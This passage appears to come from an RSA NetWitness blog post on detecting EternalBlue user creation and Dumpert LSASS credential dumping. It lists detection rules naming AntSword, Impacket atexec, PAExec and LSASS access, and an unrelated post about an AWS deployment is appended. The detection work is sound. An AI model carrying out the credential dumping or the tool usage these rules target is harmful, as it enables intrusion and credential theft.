Navigating back to Investigate, and this time opening the Events view for creates local user account, we see lsass.exe running net.exe to create a user account called helpdesk; this is the EternalBlue exploit. LSASS should never create a user; this is a high fidelity indicator of malicious activity:


Another common attacker action is to dump credentials. Due to the popularity of Mimikatz, attackers are looking for other methods of dumping credentials; this typically involves creating a memory dump of the LSASS process. We can therefore use the following query (action = 'openosprocess' && filename.dst = 'lsass.exe'), and open the Filename Source meta key to look for anything opening LSASS that stands out as anomalous. Here we can see a suspect executable opening LSASS, named Outflank-Dumpert.exe:


As defenders, we should continue to triage all of the meta values observed. But for this blog post, I feel we have demonstrated NetWitness' ability to detect these threats.


Detection Rules

The following table lists some application rules you can deploy to help with identifying these tools and behaviours:





Packet Decoder

Requests of interest to Picker.aspx

service = 80 && action = 'post' && filename = 'picker.aspx' && directory contains '_layout'


Packet Decoder

AntSword tool usage

client begins 'antsword'


Packet Decoder

Possible Impacket atexec usage

service = 139 && analysis.service = 'named pipe' && filename = 'atsvc' && filename ends 'tmp'


Packet Decoder

Dumpert LSASS dump

filename = 'dumpert.dmp'


Packet Decoder

Possible EternalBlue exploit

service = 139 && error = 'not implemented' && eoc = 'smb v1 response'


Packet Decoder

PAExec activity

service = 139 && filename = 'svcctl' && filename contains 'paexe'



Endpoint Log Hybrid

Opens OS process LSASS

action = 'openosprocess' && filename.dst='lsass.exe'


Endpoint Log Hybrid

LSASS creates user

filename.src = 'lsass.exe' && filename.dst = 'net.exe' && param.dst contains '/add'




Threat actors are consistently evolving and developing new attack methods, but they are also using tried and tested methods as well - there is no need for them to use a new exploit when a well-known one works just fine on an unpatched system. Defenders should not only be keeping up to date with the new, but also retroactively searching their data sets for the old.

Hi everyone!  In this video blog, I provide a demo of getting an 11.4 RSA NetWitness Platform full stack deployment within AWS. The demo deployment includes the following hosts:

  • NW Server
  • Network Hybrid
  • Health & Wellness Beta
  • Analyst UI


Please like or comment to let me know if this vblog was useful.



RSA NetWitness Platform - Product Manager
